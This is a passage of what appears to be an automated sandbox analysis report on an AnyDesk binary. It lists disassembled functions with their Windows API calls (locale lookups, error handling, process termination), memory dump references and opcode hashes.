                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2325560087-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: 9cb188435df57f47b62d98e2d035c99d1da42347d62eab8fb4841983b601f6f4
                                                                                                                                                                                                                                                  • Instruction ID: eac84bbe46a63821a8e7db53339751663b3abb56a7741ba794796a2f0b47777f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cb188435df57f47b62d98e2d035c99d1da42347d62eab8fb4841983b601f6f4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9451AFB1E002198FEF04CF6AE4927AEBBF4FB08714F10852AD855EB280E7749461CF91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5AD29 Relevance: 3.2, APIs: 2, Instructions: 192COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 69C5ADD0
                                                                                                                                                                                                                                                    • Part of subcall function 69C46183: IsProcessorFeaturePresent.KERNEL32(00000017,69C46155,0000010C,00000000,00000000,00000000,00000000,00000000,?,?,69C46175,00000000,00000000,00000000,00000000,00000000), ref: 69C46185
                                                                                                                                                                                                                                                    • Part of subcall function 69C46183: GetCurrentProcess.KERNEL32(C0000417,00000000,0000010C,69C322CA), ref: 69C461A7
                                                                                                                                                                                                                                                    • Part of subcall function 69C46183: TerminateProcess.KERNEL32(00000000), ref: 69C461AE
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5AF11
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$Process_free$CodeCurrentFeatureInfoLocalePagePresentProcessorTerminateValid_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3156739809-0
                                                                                                                                                                                                                                                  • Opcode ID: 253eec1b7daa80d711c47aa827c3ea1ad9db1d5989c7edcb15dedbe8c8838c4d
                                                                                                                                                                                                                                                  • Instruction ID: 9cada54d5f831aaf5d1909e35ac655dfaf9ea2a573888d1375164c63cd7ca743
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 253eec1b7daa80d711c47aa827c3ea1ad9db1d5989c7edcb15dedbe8c8838c4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D451E636700205AAE715EA76FC45FB773A8EF85774F008529A916DB180FB70E83187B9
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5B329 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5B37D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1663032902-0
                                                                                                                                                                                                                                                  • Opcode ID: e9ece3c5031ea63bfca9a1d0138a27f7aef3aff5d6f9ab78beea6884c7d8db20
                                                                                                                                                                                                                                                  • Instruction ID: c56e6f9aa5fc211f94e2350ab4e56fbfcbc723648031bd4f48deccf2ff6c9bd1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9ece3c5031ea63bfca9a1d0138a27f7aef3aff5d6f9ab78beea6884c7d8db20
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C21D03254421AABDB14CE28EC81BAA7BA8EF09314F10407BFE02D6180FF34E875CB54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5AEBD Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5AF11
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1663032902-0
                                                                                                                                                                                                                                                  • Opcode ID: ba48e2502b205e51db516e72cdbc6f5a5dcde6a5be65dfdf4c7f87c3f58a0e61
                                                                                                                                                                                                                                                  • Instruction ID: b21dcf8fd164de4f95acd976ecee1959fd918126a8be9f045658e1972035f243
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba48e2502b205e51db516e72cdbc6f5a5dcde6a5be65dfdf4c7f87c3f58a0e61
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C110A766001169FD714CF29EC41ABA77ACEF45320B1091BAE906C7540FB34E921C794
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5AFB1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(69C5B0D9,00000001), ref: 69C5B023
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                                                                  • Opcode ID: 5493d2b52bbc1bee9ef6e8ecc3c3a4fbaad21a4c272302574a2e6f7c0802996b
                                                                                                                                                                                                                                                  • Instruction ID: 3cb23a1ea42866e6a518d455b547db645413b5a8384a0913e8545316a5edbe2c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5493d2b52bbc1bee9ef6e8ecc3c3a4fbaad21a4c272302574a2e6f7c0802996b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8911297B2047019FDB189F3AD9A167ABBA1FFC4368B54452DD54787A40E3316463C740
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5B559 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,69C5B2F7,00000000,00000000,?), ref: 69C5B585
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2692324296-0
                                                                                                                                                                                                                                                  • Opcode ID: 97bdd1d2b7bb11d2eb2acb0f58b39b66864c1c297cff84c91439e03f515a3096
                                                                                                                                                                                                                                                  • Instruction ID: d7761461c551aeb9bfcfede9587572eebda8741099ae7003b96a2c3acfd86c7c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97bdd1d2b7bb11d2eb2acb0f58b39b66864c1c297cff84c91439e03f515a3096
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DEF02D76600515AFDB1C8A65D805BBB7F68FF40754F40446AED16A3180FA30FE32C6D4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5B04C Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(69C5B329,00000001), ref: 69C5B098
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                                                                  • Opcode ID: ee0714b982d332cadc5996705f9dbd42ecfa4b3b7447e9f43b79dcce27fe8a30
                                                                                                                                                                                                                                                  • Instruction ID: b8f461d50a46892d5a5df8d0baa5dbdd611f7ad3cf97292ff258db6de270e98a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee0714b982d332cadc5996705f9dbd42ecfa4b3b7447e9f43b79dcce27fe8a30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F022762003055FD7148E3AE991A7A7FA5EFC1368F44842DE9028B640E7719822C644
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4EC36 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4B688: EnterCriticalSection.KERNEL32(?,?,69C4B4E9,00000000,69C7B718,0000000C,69C3F041,?,69C40906,?,?,69C31BDD,0000012C), ref: 69C4B697
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(69C4EBF0,00000001,69C7B8B8,0000000C), ref: 69C4EC6E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                                  • Opcode ID: 70a1a6973db624ebf6de80e3ae2f6f193c4d06ccda6f1d88da1567f902254d6c
                                                                                                                                                                                                                                                  • Instruction ID: 69868d08a5c580967c2b5351f34cc50dc1cb5e7b088565517925deb40657316e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70a1a6973db624ebf6de80e3ae2f6f193c4d06ccda6f1d88da1567f902254d6c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF03736A10214DFDB14DF68D404BAD3BB0EB05724F51D11AF810DF290EB348A428F86
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5F147 Relevance: 1.5, APIs: 1, Instructions: 33timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 481472006-0
                                                                                                                                                                                                                                                  • Opcode ID: f322af12d1a828829cff4222591d16af9ee1c0feb2f8c234e6c354ee71648917
                                                                                                                                                                                                                                                  • Instruction ID: 42d6799ccf4618e6224298088dbe56d631f5420a8a8fc0739c3f238780233c7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f322af12d1a828829cff4222591d16af9ee1c0feb2f8c234e6c354ee71648917
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EF0F038D0011ED7CF08EF99C9117FEB7B8AF29705F80403AA802EA640E7388A51D3A5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4F15E Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,69C51EFE,?,20001004,?,00000002,?), ref: 69C4F19D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                  • Opcode ID: a3cd16943c6fe0efd4f8908d61c2a96b937534f51f198e32e6c52121e26383bd
                                                                                                                                                                                                                                                  • Instruction ID: 72c24aac7921f08445f46e673fe6d1fedeaf120f8e8e84afb51e34d84f733424
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3cd16943c6fe0efd4f8908d61c2a96b937534f51f198e32e6c52121e26383bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27F05E39641268EFCF129F21EC00A6E7B65EF49B10F408015FC0556210DB329E11EA95
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5AF66 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(Function_0003AEBD,00000001), ref: 69C5AF9D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                                                                  • Opcode ID: c976b867ef68ddeb0d00448ff9d0845c64af06267d2cee0ff4ae14a5382ff0d8
                                                                                                                                                                                                                                                  • Instruction ID: 6c40ae05b1694c7d9fcf12b5a47f5c1bb2cfa33a4b57b929d7ae9637bf96cb7a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c976b867ef68ddeb0d00448ff9d0845c64af06267d2cee0ff4ae14a5382ff0d8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F0553A30020957CB049F3AE955B6A7FA4EFC2764B064058EA068B680D7359863C7A0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4B428 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
